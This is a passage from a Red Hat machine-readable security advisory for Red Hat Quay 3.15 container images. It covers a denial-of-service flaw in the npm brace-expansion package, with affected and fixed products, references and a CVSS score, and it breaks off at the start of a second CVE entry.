"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64 as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.15"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x as a component of Red Hat Quay 3.15",
"product_id": "Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x",
"relates_to_product_reference": "Red Hat Quay 3.15"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-13149",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-06-30T10:00:59.843854+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2494813"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in brace-expansion. An attacker can exploit a vulnerability in the `expand()` function by providing a specially crafted string. This string, containing consecutive non-expanding brace groups, can trigger exponential-time complexity, leading to significant CPU consumption and event-loop blocking. This can result in a Denial of Service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "brace-expansion: Brace-expansion: Denial of Service due to exponential-time complexity",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in brace-expansion, a widely-used npm package for expanding brace sequences. The expand() function exhibits exponential-time complexity when processing consecutive non-expanding brace groups. An attacker who can supply crafted input to expand(), directly or transitively via minimatch or glob, can cause significant CPU consumption and event-loop blocking, resulting in denial of service. The max option does not mitigate this issue, as it bounds the output size rather than the recursion work.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-13149"
},
{
"category": "external",
"summary": "RHBZ#2494813",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494813"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-13149",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-13149"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-13149",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13149"
},
{
"category": "external",
"summary": "https://github.com/juliangruber/brace-expansion/commit/c7e33ec13ac1a684c116720843ce24e208611754",
"url": "https://github.com/juliangruber/brace-expansion/commit/c7e33ec13ac1a684c116720843ce24e208611754"
},
{
"category": "external",
"summary": "https://www.npmjs.com/package/brace-expansion",
"url": "https://www.npmjs.com/package/brace-expansion"
}
],
"release_date": "2026-06-30T08:30:34.502000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "workaround",
"details": "There is no practical mitigation for this vulnerability. The brace-expansion package is typically a transitive dependency pulled in via minimatch and glob, making it difficult to isolate. Users should upgrade to a fixed version of brace-expansion when one becomes available.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "brace-expansion: Brace-expansion: Denial of Service due to exponential-time complexity"
},
{
"cve": "CVE-2026-45822",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2026-06-30T09:01:06.468966+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
